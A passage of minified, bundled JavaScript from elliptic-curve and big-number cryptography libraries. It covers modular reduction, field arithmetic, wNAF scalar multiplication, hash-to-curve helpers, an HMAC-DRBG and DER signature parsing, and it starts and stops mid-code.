                        I.call(this, e), this.shift = this.m.bitLength(), this.shift % 26 != 0 && (this.shift += 26 - this.shift % 26), this.r = new o(1).iushln(this.shift), this.r2 = this.imod(this.r.sqr()), this.rinv = this.r._invmp(this.m), this.minv = this.rinv.mul(this.r).isubn(1).div(this.m), this.minv = this.minv.umod(this.r), this.minv = this.r.sub(this.minv);
                    }
                    A.prototype._tmp = function() {
                        var e = new o(null);
                        return e.words = new Array(Math.ceil(this.n / 13)), e;
                    }, A.prototype.ireduce = function(e) {
                        var t, r = e;
                        do this.split(r, this.tmp), t = (r = (r = this.imulK(r)).iadd(this.tmp)).bitLength();
                        while (t > this.n);
                        var n = t < this.n ? -1 : r.ucmp(this.p);
                        return 0 === n ? (r.words[0] = 0, r.length = 1) : n > 0 ? r.isub(this.p) : void 0 !== r.strip ? r.strip() : r._strip(), r;
                    }, A.prototype.split = function(e, t) {
                        e.iushrn(this.n, 0, t);
                    }, A.prototype.imulK = function(e) {
                        return e.imul(this.k);
                    }, i(_, A), _.prototype.split = function(e, t) {
                        for(var r = 4194303, n = Math.min(e.length, 9), i = 0; i < n; i++)t.words[i] = e.words[i];
                        if (t.length = n, e.length <= 9) return e.words[0] = 0, void (e.length = 1);
                        var o = e.words[9];
                        for(t.words[t.length++] = o & r, i = 10; i < e.length; i++){
                            var s = 0 | e.words[i];
                            e.words[i - 10] = (s & r) << 4 | o >>> 22, o = s;
                        }
                        o >>>= 22, e.words[i - 10] = o, 0 === o && e.length > 10 ? e.length -= 10 : e.length -= 9;
                    }, _.prototype.imulK = function(e) {
                        e.words[e.length] = 0, e.words[e.length + 1] = 0, e.length += 2;
                        for(var t = 0, r = 0; r < e.length; r++){
                            var n = 0 | e.words[r];
                            t += 977 * n, e.words[r] = 67108863 & t, t = 64 * n + (t / 67108864 | 0);
                        }
                        return 0 === e.words[e.length - 1] && (e.length--, 0 === e.words[e.length - 1] && e.length--), e;
                    }, i(w, A), i(T, A), i(R, A), R.prototype.imulK = function(e) {
                        for(var t = 0, r = 0; r < e.length; r++){
                            var n = 19 * (0 | e.words[r]) + t, i = 67108863 & n;
                            n >>>= 26, e.words[r] = i, t = n;
                        }
                        return 0 !== t && (e.words[e.length++] = t), e;
                    }, o._prime = function(e) {
                        if (E[e]) return E[e];
                        var t;
                        if ("k256" === e) t = new _;
                        else if ("p224" === e) t = new w;
                        else if ("p192" === e) t = new T;
                        else {
                            if ("p25519" !== e) throw new Error("Unknown prime " + e);
                            t = new R;
                        }
                        return E[e] = t, t;
                    }, I.prototype._verify1 = function(e) {
                        n(0 === e.negative, "red works only with positives"), n(e.red, "red works only with red numbers");
                    }, I.prototype._verify2 = function(e, t) {
                        n(0 == (e.negative | t.negative), "red works only with positives"), n(e.red && e.red === t.red, "red works only with red numbers");
                    }, I.prototype.imod = function(e) {
                        return this.prime ? this.prime.ireduce(e)._forceRed(this) : (l(e, e.umod(this.m)._forceRed(this)), e);
                    }, I.prototype.neg = function(e) {
                        return e.isZero() ? e.clone() : this.m.sub(e)._forceRed(this);
                    }, I.prototype.add = function(e, t) {
                        this._verify2(e, t);
                        var r = e.add(t);
                        return r.cmp(this.m) >= 0 && r.isub(this.m), r._forceRed(this);
                    }, I.prototype.iadd = function(e, t) {
                        this._verify2(e, t);
                        var r = e.iadd(t);
                        return r.cmp(this.m) >= 0 && r.isub(this.m), r;
                    }, I.prototype.sub = function(e, t) {
                        this._verify2(e, t);
                        var r = e.sub(t);
                        return r.cmpn(0) < 0 && r.iadd(this.m), r._forceRed(this);
                    }, I.prototype.isub = function(e, t) {
                        this._verify2(e, t);
                        var r = e.isub(t);
                        return r.cmpn(0) < 0 && r.iadd(this.m), r;
                    }, I.prototype.shl = function(e, t) {
                        return this._verify1(e), this.imod(e.ushln(t));
                    }, I.prototype.imul = function(e, t) {
                        return this._verify2(e, t), this.imod(e.imul(t));
                    }, I.prototype.mul = function(e, t) {
                        return this._verify2(e, t), this.imod(e.mul(t));
                    }, I.prototype.isqr = function(e) {
                        return this.imul(e, e.clone());
                    }, I.prototype.sqr = function(e) {
                        return this.mul(e, e);
                    }, I.prototype.sqrt = function(e) {
                        if (e.isZero()) return e.clone();
                        var t = this.m.andln(3);
                        if (n(t % 2 == 1), 3 === t) {
                            var r = this.m.add(new o(1)).iushrn(2);
                            return this.pow(e, r);
                        }
                        for(var i = this.m.subn(1), s = 0; !i.isZero() && 0 === i.andln(1);)s++, i.iushrn(1);
                        n(!i.isZero());
                        var a = new o(1).toRed(this), u = a.redNeg(), c = this.m.subn(1).iushrn(1), l = this.m.bitLength();
                        for(l = new o(2 * l * l).toRed(this); 0 !== this.pow(l, c).cmp(u);)l.redIAdd(u);
                        for(var d = this.pow(l, i), h = this.pow(e, i.addn(1).iushrn(1)), f = this.pow(e, i), p = s; 0 !== f.cmp(a);){
                            for(var m = f, g = 0; 0 !== m.cmp(a); g++)m = m.redSqr();
                            n(g < p);
                            var y = this.pow(d, new o(1).iushln(p - g - 1));
                            h = h.redMul(y), d = y.redSqr(), f = f.redMul(d), p = g;
                        }
                        return h;
                    }, I.prototype.invm = function(e) {
                        var t = e._invmp(this.m);
                        return 0 !== t.negative ? (t.negative = 0, this.imod(t).redNeg()) : this.imod(t);
                    }, I.prototype.pow = function(e, t) {
                        if (t.isZero()) return new o(1).toRed(this);
                        if (0 === t.cmpn(1)) return e.clone();
                        var r = new Array(16);
                        r[0] = new o(1).toRed(this), r[1] = e;
                        for(var n = 2; n < r.length; n++)r[n] = this.mul(r[n - 1], e);
                        var i = r[0], s = 0, a = 0, u = t.bitLength() % 26;
                        for(0 === u && (u = 26), n = t.length - 1; n >= 0; n--){
                            for(var c = t.words[n], l = u - 1; l >= 0; l--){
                                var d = c >> l & 1;
                                i !== r[0] && (i = this.sqr(i)), 0 !== d || 0 !== s ? (s <<= 1, s |= d, (4 == ++a || 0 === n && 0 === l) && (i = this.mul(i, r[s]), a = 0, s = 0)) : a = 0;
                            }
                            u = 26;
                        }
                        return i;
                    }, I.prototype.convertTo = function(e) {
                        var t = e.umod(this.m);
                        return t === e ? t.clone() : t;
                    }, I.prototype.convertFrom = function(e) {
                        var t = e.clone();
                        return t.red = null, t;
                    }, o.mont = function(e) {
                        return new S(e);
                    }, i(S, I), S.prototype.convertTo = function(e) {
                        return this.imod(e.ushln(this.shift));
                    }, S.prototype.convertFrom = function(e) {
                        var t = this.imod(e.mul(this.rinv));
                        return t.red = null, t;
                    }, S.prototype.imul = function(e, t) {
                        if (e.isZero() || t.isZero()) return e.words[0] = 0, e.length = 1, e;
                        var r = e.imul(t), n = r.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m), i = r.isub(n).iushrn(this.shift), o = i;
                        return i.cmp(this.m) >= 0 ? o = i.isub(this.m) : i.cmpn(0) < 0 && (o = i.iadd(this.m)), o._forceRed(this);
                    }, S.prototype.mul = function(e, t) {
                        if (e.isZero() || t.isZero()) return new o(0)._forceRed(this);
                        var r = e.mul(t), n = r.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m), i = r.isub(n).iushrn(this.shift), s = i;
                        return i.cmp(this.m) >= 0 ? s = i.isub(this.m) : i.cmpn(0) < 0 && (s = i.iadd(this.m)), s._forceRed(this);
                    }, S.prototype.invm = function(e) {
                        return this.imod(e._invmp(this.m).mul(this.r2))._forceRed(this);
                    };
                }(e = r.nmd(e), this);
            },
            5887: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createCurve = t.getHash = void 0;
                const n = r(1377), i = r(64), o = r(7851);
                function s(e) {
                    return {
                        hash: e,
                        hmac: (t, ...r)=>(0, n.hmac)(e, t, (0, i.concatBytes)(...r)),
                        randomBytes: i.randomBytes
                    };
                }
                t.getHash = s, t.createCurve = function(e, t) {
                    const r = (t)=>(0, o.weierstrass)({
                            ...e,
                            ...s(t)
                        });
                    return Object.freeze({
                        ...r(t),
                        create: r
                    });
                };
            },
            1465: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateBasic = t.wNAF = void 0;
                const n = r(9530), i = r(4323), o = BigInt(0), s = BigInt(1);
                t.wNAF = function(e, t) {
                    const r = (e, t)=>{
                        const r = t.negate();
                        return e ? r : t;
                    }, n = (e)=>({
                            windows: Math.ceil(t / e) + 1,
                            windowSize: 2 ** (e - 1)
                        });
                    return {
                        constTimeNegate: r,
                        unsafeLadder (t, r) {
                            let n = e.ZERO, i = t;
                            for(; r > o;)r & s && (n = n.add(i)), i = i.double(), r >>= s;
                            return n;
                        },
                        precomputeWindow (e, t) {
                            const { windows: r, windowSize: i } = n(t), o = [];
                            let s = e, a = s;
                            for(let e = 0; e < r; e++){
                                a = s, o.push(a);
                                for(let e = 1; e < i; e++)a = a.add(s), o.push(a);
                                s = a.double();
                            }
                            return o;
                        },
                        wNAF (t, i, o) {
                            const { windows: a, windowSize: u } = n(t);
                            let c = e.ZERO, l = e.BASE;
                            const d = BigInt(2 ** t - 1), h = 2 ** t, f = BigInt(t);
                            for(let e = 0; e < a; e++){
                                const t = e * u;
                                let n = Number(o & d);
                                o >>= f, n > u && (n -= h, o += s);
                                const a = t, p = t + Math.abs(n) - 1, m = e % 2 != 0, g = n < 0;
                                0 === n ? l = l.add(r(m, i[a])) : c = c.add(r(g, i[p]));
                            }
                            return {
                                p: c,
                                f: l
                            };
                        },
                        wNAFCached (e, t, r, n) {
                            const i = e._WINDOW_SIZE || 1;
                            let o = t.get(e);
                            return o || (o = this.precomputeWindow(e, i), 1 !== i && t.set(e, n(o))), this.wNAF(i, o, r);
                        }
                    };
                }, t.validateBasic = function(e) {
                    return (0, n.validateField)(e.Fp), (0, i.validateObject)(e, {
                        n: "bigint",
                        h: "bigint",
                        Gx: "field",
                        Gy: "field"
                    }, {
                        nBitLength: "isSafeInteger",
                        nByteLength: "isSafeInteger"
                    }), Object.freeze({
                        ...(0, n.nLength)(e.n, e.nBitLength),
                        ...e,
                        p: e.Fp.ORDER
                    });
                };
            },
            1322: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createHasher = t.isogenyMap = t.hash_to_field = t.expand_message_xof = t.expand_message_xmd = void 0;
                const n = r(9530), i = r(4323), o = i.bytesToNumberBE;
                function s(e, t) {
                    if (e < 0 || e >= 1 << 8 * t) throw new Error(`bad I2OSP call: value=${e} length=${t}`);
                    const r = Array.from({
                        length: t
                    }).fill(0);
                    for(let n = t - 1; n >= 0; n--)r[n] = 255 & e, e >>>= 8;
                    return new Uint8Array(r);
                }
                function a(e, t) {
                    const r = new Uint8Array(e.length);
                    for(let n = 0; n < e.length; n++)r[n] = e[n] ^ t[n];
                    return r;
                }
                function u(e) {
                    if (!(e instanceof Uint8Array)) throw new Error("Uint8Array expected");
                }
                function c(e) {
                    if (!Number.isSafeInteger(e)) throw new Error("number expected");
                }
                function l(e, t, r, n) {
                    u(e), u(t), c(r), t.length > 255 && (t = n((0, i.concatBytes)((0, i.utf8ToBytes)("H2C-OVERSIZE-DST-"), t)));
                    const { outputLen: o, blockLen: l } = n, d = Math.ceil(r / o);
                    if (d > 255) throw new Error("Invalid xmd length");
                    const h = (0, i.concatBytes)(t, s(t.length, 1)), f = s(0, l), p = s(r, 2), m = new Array(d), g = n((0, i.concatBytes)(f, e, p, s(0, 1), h));
                    m[0] = n((0, i.concatBytes)(g, s(1, 1), h));
                    for(let e = 1; e <= d; e++){
                        const t = [
                            a(g, m[e - 1]),
                            s(e + 1, 1),
                            h
                        ];
                        m[e] = n((0, i.concatBytes)(...t));
                    }
                    return (0, i.concatBytes)(...m).slice(0, r);
                }
                function d(e, t, r, n, o) {
                    if (u(e), u(t), c(r), t.length > 255) {
                        const e = Math.ceil(2 * n / 8);
                        t = o.create({
                            dkLen: e
                        }).update((0, i.utf8ToBytes)("H2C-OVERSIZE-DST-")).update(t).digest();
                    }
                    if (r > 65535 || t.length > 255) throw new Error("expand_message_xof: invalid lenInBytes");
                    return o.create({
                        dkLen: r
                    }).update(e).update(s(r, 2)).update(t).update(s(t.length, 1)).digest();
                }
                function h(e, t, r) {
                    (0, i.validateObject)(r, {
                        DST: "string",
                        p: "bigint",
                        m: "isSafeInteger",
                        k: "isSafeInteger",
                        hash: "hash"
                    });
                    const { p: s, k: a, m: h, hash: f, expand: p, DST: m } = r;
                    u(e), c(t);
                    const g = function(e) {
                        if (e instanceof Uint8Array) return e;
                        if ("string" == typeof e) return (0, i.utf8ToBytes)(e);
                        throw new Error("DST must be Uint8Array or string");
                    }(m), y = s.toString(2).length, v = Math.ceil((y + a) / 8), b = t * h * v;
                    let E;
                    if ("xmd" === p) E = l(e, g, b, f);
                    else if ("xof" === p) E = d(e, g, b, a, f);
                    else {
                        if ("_internal_pass" !== p) throw new Error('expand must be "xmd" or "xof"');
                        E = e;
                    }
                    const A = new Array(t);
                    for(let e = 0; e < t; e++){
                        const t = new Array(h);
                        for(let r = 0; r < h; r++){
                            const i = v * (r + e * h), a = E.subarray(i, i + v);
                            t[r] = (0, n.mod)(o(a), s);
                        }
                        A[e] = t;
                    }
                    return A;
                }
                t.expand_message_xmd = l, t.expand_message_xof = d, t.hash_to_field = h, t.isogenyMap = function(e, t) {
                    const r = t.map((e)=>Array.from(e).reverse());
                    return (t, n)=>{
                        const [i, o, s, a] = r.map((r)=>r.reduce((r, n)=>e.add(e.mul(r, t), n)));
                        return t = e.div(i, o), n = e.mul(n, e.div(s, a)), {
                            x: t,
                            y: n
                        };
                    };
                }, t.createHasher = function(e, t, r) {
                    if ("function" != typeof t) throw new Error("mapToCurve() must be defined");
                    return {
                        hashToCurve (n, i) {
                            const o = h(n, 2, {
                                ...r,
                                DST: r.DST,
                                ...i
                            }), s = e.fromAffine(t(o[0])), a = e.fromAffine(t(o[1])), u = s.add(a).clearCofactor();
                            return u.assertValidity(), u;
                        },
                        encodeToCurve (n, i) {
                            const o = h(n, 1, {
                                ...r,
                                DST: r.encodeDST,
                                ...i
                            }), s = e.fromAffine(t(o[0])).clearCofactor();
                            return s.assertValidity(), s;
                        }
                    };
                };
            },
            9530: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hashToPrivateScalar = t.FpSqrtEven = t.FpSqrtOdd = t.Field = t.nLength = t.FpIsSquare = t.FpDiv = t.FpInvertBatch = t.FpPow = t.validateField = t.isNegativeLE = t.FpSqrt = t.tonelliShanks = t.invert = t.pow2 = t.pow = t.mod = void 0;
                const n = r(4323), i = BigInt(0), o = BigInt(1), s = BigInt(2), a = BigInt(3), u = BigInt(4), c = BigInt(5), l = BigInt(8);
                function d(e, t) {
                    const r = e % t;
                    return r >= i ? r : t + r;
                }
                function h(e, t, r) {
                    if (r <= i || t < i) throw new Error("Expected power/modulo > 0");
                    if (r === o) return i;
                    let n = o;
                    for(; t > i;)t & o && (n = n * e % r), e = e * e % r, t >>= o;
                    return n;
                }
                function f(e, t) {
                    if (e === i || t <= i) throw new Error(`invert: expected positive integers, got n=${e} mod=${t}`);
                    let r = d(e, t), n = t, s = i, a = o, u = o, c = i;
                    for(; r !== i;){
                        const e = n / r, t = n % r, i = s - u * e, o = a - c * e;
                        n = r, r = t, s = u, a = c, u = i, c = o;
                    }
                    if (n !== o) throw new Error("invert: does not exist");
                    return d(s, t);
                }
                function p(e) {
                    const t = (e - o) / s;
                    let r, n, a;
                    for(r = e - o, n = 0; r % s === i; r /= s, n++);
                    for(a = s; a < e && h(a, t, e) !== e - o; a++);
                    if (1 === n) {
                        const t = (e + o) / u;
                        return function(e, r) {
                            const n = e.pow(r, t);
                            if (!e.eql(e.sqr(n), r)) throw new Error("Cannot find square root");
                            return n;
                        };
                    }
                    const c = (r + o) / s;
                    return function(e, i) {
                        if (e.pow(i, t) === e.neg(e.ONE)) throw new Error("Cannot find square root");
                        let s = n, u = e.pow(e.mul(e.ONE, a), r), l = e.pow(i, c), d = e.pow(i, r);
                        for(; !e.eql(d, e.ONE);){
                            if (e.eql(d, e.ZERO)) return e.ZERO;
                            let t = 1;
                            for(let r = e.sqr(d); t < s && !e.eql(r, e.ONE); t++)r = e.sqr(r);
                            const r = e.pow(u, o << BigInt(s - t - 1));
                            u = e.sqr(r), l = e.mul(l, r), d = e.mul(d, u), s = t;
                        }
                        return l;
                    };
                }
                function m(e) {
                    if (e % u === a) {
                        const t = (e + o) / u;
                        return function(e, r) {
                            const n = e.pow(r, t);
                            if (!e.eql(e.sqr(n), r)) throw new Error("Cannot find square root");
                            return n;
                        };
                    }
                    if (e % l === c) {
                        const t = (e - c) / l;
                        return function(e, r) {
                            const n = e.mul(r, s), i = e.pow(n, t), o = e.mul(r, i), a = e.mul(e.mul(o, s), i), u = e.mul(o, e.sub(a, e.ONE));
                            if (!e.eql(e.sqr(u), r)) throw new Error("Cannot find square root");
                            return u;
                        };
                    }
                    return p(e);
                }
                BigInt(9), BigInt(16), t.mod = d, t.pow = h, t.pow2 = function(e, t, r) {
                    let n = e;
                    for(; t-- > i;)n *= n, n %= r;
                    return n;
                }, t.invert = f, t.tonelliShanks = p, t.FpSqrt = m, t.isNegativeLE = (e, t)=>(d(e, t) & o) === o;
                const g = [
                    "create",
                    "isValid",
                    "is0",
                    "neg",
                    "inv",
                    "sqrt",
                    "sqr",
                    "eql",
                    "add",
                    "sub",
                    "mul",
                    "pow",
                    "div",
                    "addN",
                    "subN",
                    "mulN",
                    "sqrN"
                ];
                function y(e, t, r) {
                    if (r < i) throw new Error("Expected power > 0");
                    if (r === i) return e.ONE;
                    if (r === o) return t;
                    let n = e.ONE, s = t;
                    for(; r > i;)r & o && (n = e.mul(n, s)), s = e.sqr(s), r >>= o;
                    return n;
                }
                function v(e, t) {
                    const r = new Array(t.length), n = t.reduce((t, n, i)=>e.is0(n) ? t : (r[i] = t, e.mul(t, n)), e.ONE), i = e.inv(n);
                    return t.reduceRight((t, n, i)=>e.is0(n) ? t : (r[i] = e.mul(t, r[i]), e.mul(t, n)), i), r;
                }
                function b(e, t) {
                    const r = void 0 !== t ? t : e.toString(2).length;
                    return {
                        nBitLength: r,
                        nByteLength: Math.ceil(r / 8)
                    };
                }
                t.validateField = function(e) {
                    const t = g.reduce((e, t)=>(e[t] = "function", e), {
                        ORDER: "bigint",
                        MASK: "bigint",
                        BYTES: "isSafeInteger",
                        BITS: "isSafeInteger"
                    });
                    return (0, n.validateObject)(e, t);
                }, t.FpPow = y, t.FpInvertBatch = v, t.FpDiv = function(e, t, r) {
                    return e.mul(t, "bigint" == typeof r ? f(r, e.ORDER) : e.inv(r));
                }, t.FpIsSquare = function(e) {
                    const t = (e.ORDER - o) / s;
                    return (r)=>{
                        const n = e.pow(r, t);
                        return e.eql(n, e.ZERO) || e.eql(n, e.ONE);
                    };
                }, t.nLength = b, t.Field = function(e, t, r = !1, s = {}) {
                    if (e <= i) throw new Error(`Expected Fp ORDER > 0, got ${e}`);
                    const { nBitLength: a, nByteLength: u } = b(e, t);
                    if (u > 2048) throw new Error("Field lengths over 2048 bytes are not supported");
                    const c = m(e), l = Object.freeze({
                        ORDER: e,
                        BITS: a,
                        BYTES: u,
                        MASK: (0, n.bitMask)(a),
                        ZERO: i,
                        ONE: o,
                        create: (t)=>d(t, e),
                        isValid: (t)=>{
                            if ("bigint" != typeof t) throw new Error("Invalid field element: expected bigint, got " + typeof t);
                            return i <= t && t < e;
                        },
                        is0: (e)=>e === i,
                        isOdd: (e)=>(e & o) === o,
                        neg: (t)=>d(-t, e),
                        eql: (e, t)=>e === t,
                        sqr: (t)=>d(t * t, e),
                        add: (t, r)=>d(t + r, e),
                        sub: (t, r)=>d(t - r, e),
                        mul: (t, r)=>d(t * r, e),
                        pow: (e, t)=>y(l, e, t),
                        div: (t, r)=>d(t * f(r, e), e),
                        sqrN: (e)=>e * e,
                        addN: (e, t)=>e + t,
                        subN: (e, t)=>e - t,
                        mulN: (e, t)=>e * t,
                        inv: (t)=>f(t, e),
                        sqrt: s.sqrt || ((e)=>c(l, e)),
                        invertBatch: (e)=>v(l, e),
                        cmov: (e, t, r)=>r ? t : e,
                        toBytes: (e)=>r ? (0, n.numberToBytesLE)(e, u) : (0, n.numberToBytesBE)(e, u),
                        fromBytes: (e)=>{
                            if (e.length !== u) throw new Error(`Fp.fromBytes: expected ${u}, got ${e.length}`);
                            return r ? (0, n.bytesToNumberLE)(e) : (0, n.bytesToNumberBE)(e);
                        }
                    });
                    return Object.freeze(l);
                }, t.FpSqrtOdd = function(e, t) {
                    if (!e.isOdd) throw new Error("Field doesn't have isOdd");
                    const r = e.sqrt(t);
                    return e.isOdd(r) ? r : e.neg(r);
                }, t.FpSqrtEven = function(e, t) {
                    if (!e.isOdd) throw new Error("Field doesn't have isOdd");
                    const r = e.sqrt(t);
                    return e.isOdd(r) ? e.neg(r) : r;
                }, t.hashToPrivateScalar = function(e, t, r = !1) {
                    const i = (e = (0, n.ensureBytes)("privateHash", e)).length, s = b(t).nByteLength + 8;
                    if (s < 24 || i < s || i > 1024) throw new Error(`hashToPrivateScalar: expected ${s}-1024 bytes of input, got ${i}`);
                    return d(r ? (0, n.bytesToNumberLE)(e) : (0, n.bytesToNumberBE)(e), t - o) + o;
                };
            },
            4323: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateObject = t.createHmacDrbg = t.bitMask = t.bitSet = t.bitGet = t.bitLen = t.utf8ToBytes = t.equalBytes = t.concatBytes = t.ensureBytes = t.numberToVarBytesBE = t.numberToBytesLE = t.numberToBytesBE = t.bytesToNumberLE = t.bytesToNumberBE = t.hexToBytes = t.hexToNumber = t.numberToHexUnpadded = t.bytesToHex = void 0;
                const r = BigInt(0), n = BigInt(1), i = BigInt(2), o = (e)=>e instanceof Uint8Array, s = Array.from({
                    length: 256
                }, (e, t)=>t.toString(16).padStart(2, "0"));
                function a(e) {
                    if (!o(e)) throw new Error("Uint8Array expected");
                    let t = "";
                    for(let r = 0; r < e.length; r++)t += s[e[r]];
                    return t;
                }
                function u(e) {
                    const t = e.toString(16);
                    return 1 & t.length ? `0${t}` : t;
                }
                function c(e) {
                    if ("string" != typeof e) throw new Error("hex string expected, got " + typeof e);
                    return BigInt("" === e ? "0" : `0x${e}`);
                }
                function l(e) {
                    if ("string" != typeof e) throw new Error("hex string expected, got " + typeof e);
                    if (e.length % 2) throw new Error("hex string is invalid: unpadded " + e.length);
                    const t = new Uint8Array(e.length / 2);
                    for(let r = 0; r < t.length; r++){
                        const n = 2 * r, i = e.slice(n, n + 2), o = Number.parseInt(i, 16);
                        if (Number.isNaN(o) || o < 0) throw new Error("invalid byte sequence");
                        t[r] = o;
                    }
                    return t;
                }
                function d(...e) {
                    const t = new Uint8Array(e.reduce((e, t)=>e + t.length, 0));
                    let r = 0;
                    return e.forEach((e)=>{
                        if (!o(e)) throw new Error("Uint8Array expected");
                        t.set(e, r), r += e.length;
                    }), t;
                }
                t.bytesToHex = a, t.numberToHexUnpadded = u, t.hexToNumber = c, t.hexToBytes = l, t.bytesToNumberBE = function(e) {
                    return c(a(e));
                }, t.bytesToNumberLE = function(e) {
                    if (!o(e)) throw new Error("Uint8Array expected");
                    return c(a(Uint8Array.from(e).reverse()));
                }, t.numberToBytesBE = (e, t)=>l(e.toString(16).padStart(2 * t, "0")), t.numberToBytesLE = (e, r)=>(0, t.numberToBytesBE)(e, r).reverse(), t.numberToVarBytesBE = (e)=>l(u(e)), t.ensureBytes = function(e, t, r) {
                    let n;
                    if ("string" == typeof t) try {
                        n = l(t);
                    } catch (r) {
                        throw new Error(`${e} must be valid hex string, got "${t}". Cause: ${r}`);
                    }
                    else {
                        if (!o(t)) throw new Error(`${e} must be hex string or Uint8Array`);
                        n = Uint8Array.from(t);
                    }
                    const i = n.length;
                    if ("number" == typeof r && i !== r) throw new Error(`${e} expected ${r} bytes, got ${i}`);
                    return n;
                }, t.concatBytes = d, t.equalBytes = function(e, t) {
                    if (e.length !== t.length) return !1;
                    for(let r = 0; r < e.length; r++)if (e[r] !== t[r]) return !1;
                    return !0;
                }, t.utf8ToBytes = function(e) {
                    if ("string" != typeof e) throw new Error("utf8ToBytes expected string, got " + typeof e);
                    return (new TextEncoder).encode(e);
                }, t.bitLen = function(e) {
                    let t;
                    for(t = 0; e > r; e >>= n, t += 1);
                    return t;
                }, t.bitGet = (e, t)=>e >> BigInt(t) & n, t.bitSet = (e, t, i)=>e | (i ? n : r) << BigInt(t), t.bitMask = (e)=>(i << BigInt(e - 1)) - n;
                const h = (e)=>new Uint8Array(e), f = (e)=>Uint8Array.from(e);
                t.createHmacDrbg = function(e, t, r) {
                    if ("number" != typeof e || e < 2) throw new Error("hashLen must be a number");
                    if ("number" != typeof t || t < 2) throw new Error("qByteLen must be a number");
                    if ("function" != typeof r) throw new Error("hmacFn must be a function");
                    let n = h(e), i = h(e), o = 0;
                    const s = ()=>{
                        n.fill(1), i.fill(0), o = 0;
                    }, a = (...e)=>r(i, n, ...e), u = (e = h())=>{
                        i = a(f([
                            0
                        ]), e), n = a(), 0 !== e.length && (i = a(f([
                            1
                        ]), e), n = a());
                    }, c = ()=>{
                        if (o++ >= 1e3) throw new Error("drbg: tried 1000 values");
                        let e = 0;
                        const r = [];
                        for(; e < t;){
                            n = a();
                            const t = n.slice();
                            r.push(t), e += n.length;
                        }
                        return d(...r);
                    };
                    return (e, t)=>{
                        let r;
                        for(s(), u(e); !(r = t(c()));)u();
                        return s(), r;
                    };
                };
                const p = {
                    bigint: (e)=>"bigint" == typeof e,
                    function: (e)=>"function" == typeof e,
                    boolean: (e)=>"boolean" == typeof e,
                    string: (e)=>"string" == typeof e,
                    isSafeInteger: (e)=>Number.isSafeInteger(e),
                    array: (e)=>Array.isArray(e),
                    field: (e, t)=>t.Fp.isValid(e),
                    hash: (e)=>"function" == typeof e && Number.isSafeInteger(e.outputLen)
                };
                t.validateObject = function(e, t, r = {}) {
                    const n = (t, r, n)=>{
                        const i = p[r];
                        if ("function" != typeof i) throw new Error(`Invalid validator "${r}", expected function`);
                        const o = e[t];
                        if (!(n && void 0 === o || i(o, e))) throw new Error(`Invalid param ${String(t)}=${o} (${typeof o}), expected ${r}`);
                    };
                    for (const [e, r] of Object.entries(t))n(e, r, !1);
                    for (const [e, t] of Object.entries(r))n(e, t, !0);
                    return e;
                };
            },
            7851: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.mapToCurveSimpleSWU = t.SWUFpSqrtRatio = t.weierstrass = t.weierstrassPoints = t.DER = void 0;
                const n = r(9530), i = r(4323), o = r(4323), s = r(1465), { bytesToNumberBE: a, hexToBytes: u } = i;
                t.DER = {
                    Err: class extends Error {
                        constructor(e = ""){
                            super(e);
                        }
                    },
                    _parseInt (e) {
                        const { Err: r } = t.DER;
                        if (e.length < 2 || 2 !== e[0]) throw new r("Invalid signature integer tag");
                        const n = e[1], i = e.subarray(2, n + 2);
                        if (!n || i.length !== n) throw new r("Invalid signature integer: wrong length");
                        if (128 & i[0]) throw new r("Invalid signature integer: negative");
                        if (0 === i[0] && !(128 & i[1])) throw new r("Invalid signature integer: unnecessary leading zero");
                        return {
                            d: a(i),
                            l: e.subarray(n + 2)
                        };
                    },
                    toSig (e) {
                        const { Err: r } = t.DER, n = "string" == typeof e ? u(e) : e;
                        if (!(n instanceof Uint8Array)) throw new Error("ui8a expected");
                        let i = n.length;
                        if (i < 2 || 48 != n[0]) throw new r("Invalid signature tag");
                        if (n[1] !== i - 2) throw new r("Invalid signature: incorrect length");
                        const { d: o, l: s } = t.DER._parseInt(n.subarray(2)), { d: a, l: c } = t.DER._parseInt(s);
                        if (c.length) throw new r("Invalid signature: left bytes after parsing");
                        return {
                            r: o,
                            s: a
                        };
                    },
                    hexFromSig (e) {
                        const t = (e)=>8 & Number.parseInt(e[0], 16) ? "00" + e : e, r = (e)=>{
                            const t = e.toString(16);
                            return 1 & t.length ? `0${t}` : t;
                        }, n = t(r(e.s)), i = t(r(e.r)), o = n.length / 2, s = i.length / 2, a = r(o), u = r(s);
                        return `30${r(s + o + 4)}02${u}${i}02${a}${n}`;
                    }
                };
                const c = BigInt(0), l = BigInt(1), d = BigInt(2), h = BigInt(3), f = BigInt(4);
                function p(e) {
                    const t = function(e) {
                        const t = (0, s.validateBasic)(e);
                        i.validateObject(t, {
                            a: "field",
                            b: "field"
                        }, {
                            allowedPrivateKeyLengths: "array",
                            wrapPrivateKey: "boolean",
                            isTorsionFree: "function",
                            clearCofactor: "function",
                            allowInfinityPoint: "boolean",
                            fromBytes: "function",
                            toBytes: "function"
                        });
                        const { endo: r, Fp: n, a: o } = t;
                        if (r) {
                            if (!n.eql(o, n.ZERO)) throw new Error("Endomorphism can only be defined for Koblitz curves that have a=0");
                            if ("object" != typeof r || "bigint" != typeof r.beta || "function" != typeof r.splitScalar) throw new Error("Expected endomorphism with beta: bigint and splitScalar: function");
                        }
                        return Object.freeze({
                            ...t
                        });
                    }(e), { Fp: r } = t, a = t.toBytes || ((e, t, n)=>{
                        const o = t.toAffine();
                        return i.concatBytes(Uint8Array.from([
                            4
                        ]), r.toBytes(o.x), r.toBytes(o.y));
                    }), u = t.fromBytes || ((e)=>{
                        const t = e.subarray(1);
                        return {
                            x: r.fromBytes(t.subarray(0, r.BYTES)),
                            y: r.fromBytes(t.subarray(r.BYTES, 2 * r.BYTES))
                        };
                    });
                    function d(e) {
                        const { a: n, b: i } = t, o = r.sqr(e), s = r.mul(o, e);
                        return r.add(r.add(s, r.mul(e, n)), i);
                    }
                    if (!r.eql(r.sqr(t.Gy), d(t.Gx))) throw new Error("bad generator point: equation left != right");
                    function f(e) {
                        return "bigint" == typeof e && c < e && e < t.n;
                    }
                    function p(e) {
